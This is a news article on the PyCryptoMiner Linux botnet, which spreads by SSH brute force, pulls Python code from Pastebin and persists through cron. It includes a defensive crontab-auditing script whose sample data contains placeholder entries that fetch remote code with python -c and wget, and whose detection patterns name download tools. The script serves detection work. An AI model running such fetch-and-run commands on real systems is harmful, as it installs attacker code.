Even Linux Is Not Safe From Cryptomining Botnets

Jan 6, 2018

Hardly a week passes without the discovery of a new crypto miner that hijacks other people's computing power to produce bitcoin and the like. Security researchers at F5 have now exposed a new botnet that takes over Linux machines with a trick.

Linux Cryptomining

The botnet, which F5 named PyCryptoMiner, takes over Linux systems through brute-force attacks on the SSH protocol. If a password is guessed this way, the botnet uses the Python interpreter to execute a plain-looking and cryptically named script, which loads another Python script from a command-and-control server. This second script sets up a cron job, run every six hours, which in turn selectively loads and carries out further activities such as cryptocurrency mining.

The security experts found evidence that this method alone may have produced 158 units of the cryptocurrency since December, with a current market value of $60,000. The attackers evidently use the remote-controlled computers for other purposes as well. What is notable about PyCryptoMiner is that the botnet uses a paste on the publishing host pastebin.com as a clipboard and does not communicate directly with a specific IP address of a control server. As a result, the network cannot be disabled by blocking such a server address. One would have to block access to Pastebin.
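
A defender's check for the persistence described above, as an added example that is not taken from F5's report or from this article: it reviews user-crontab entries for a six-hour schedule combined with inline Python, a Pastebin reference or a download tool. The indicator patterns, the function names and the sample crontab are constructed assumptions.

```python
import re

# Heuristics based on the behaviour described above; the patterns are
# assumptions for illustration, not signatures published by F5.
INDICATORS = {
    "inline-python": re.compile(r"\bpython[0-9.]*\s+-c\b"),
    "paste-site": re.compile(r"pastebin\.com", re.I),
    "remote-fetch": re.compile(r"\b(curl|wget|urlopen)\b"),
}

def expand_hours(field):
    """Expand a cron hour field (lists, ranges, steps) into a set of hours."""
    hours = set()
    for part in field.split(","):
        rng, _, step = part.partition("/")
        lo, _, hi = ("0", "-", "23") if rng == "*" else rng.partition("-")
        hi = hi or ("23" if step else lo)
        hours.update(range(int(lo), int(hi) + 1, int(step or 1)))
    return hours

def six_hourly(field):
    """True when the hour field fires four times a day, six hours apart."""
    try:
        h = sorted(expand_hours(field))
    except ValueError:  # malformed hour field
        return False
    return len(h) == 4 and all(b - a == 6 for a, b in zip(h, h[1:]))

def audit_crontab(text):
    """Return (line_no, reasons) for user-crontab entries worth reviewing."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        fields = line.split(None, 5)
        # Skip comments, @shortcuts, environment assignments and short lines.
        if len(fields) < 6 or not re.fullmatch(r"[\d*,/-]+", fields[0]):
            continue
        reasons = ["six-hour-schedule"] if six_hourly(fields[1]) else []
        reasons += [n for n, rx in INDICATORS.items() if rx.search(fields[5])]
        if len(reasons) >= 2:  # one weak signal alone is too noisy
            findings.append((no, reasons))
    return findings

# Constructed sample crontab (placeholders, not from an infected host).
SAMPLE = """\
MAILTO=root
15 */6 * * * /usr/bin/rsync -a /srv /mnt/mirror
0 */6 * * * python -c "<code fetching https://pastebin.com/raw/PLACEHOLDER>"
30 0,6,12,18 * * * wget -q -O /tmp/job http://host.example.invalid/job
"""
```

Calling `audit_crontab(SAMPLE)` reports the third and fourth lines; the six-hourly rsync job is left out because a schedule on its own is a single weak signal.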


The corresponding Pastebin reference has been retrieved about a thousand times a day since August 2017. The owner of the registered domain has registered a total of 36,000 additional domains, as well as 235 different e-mail addresses. These are reportedly used for gambling portals and porn sites, among other things.
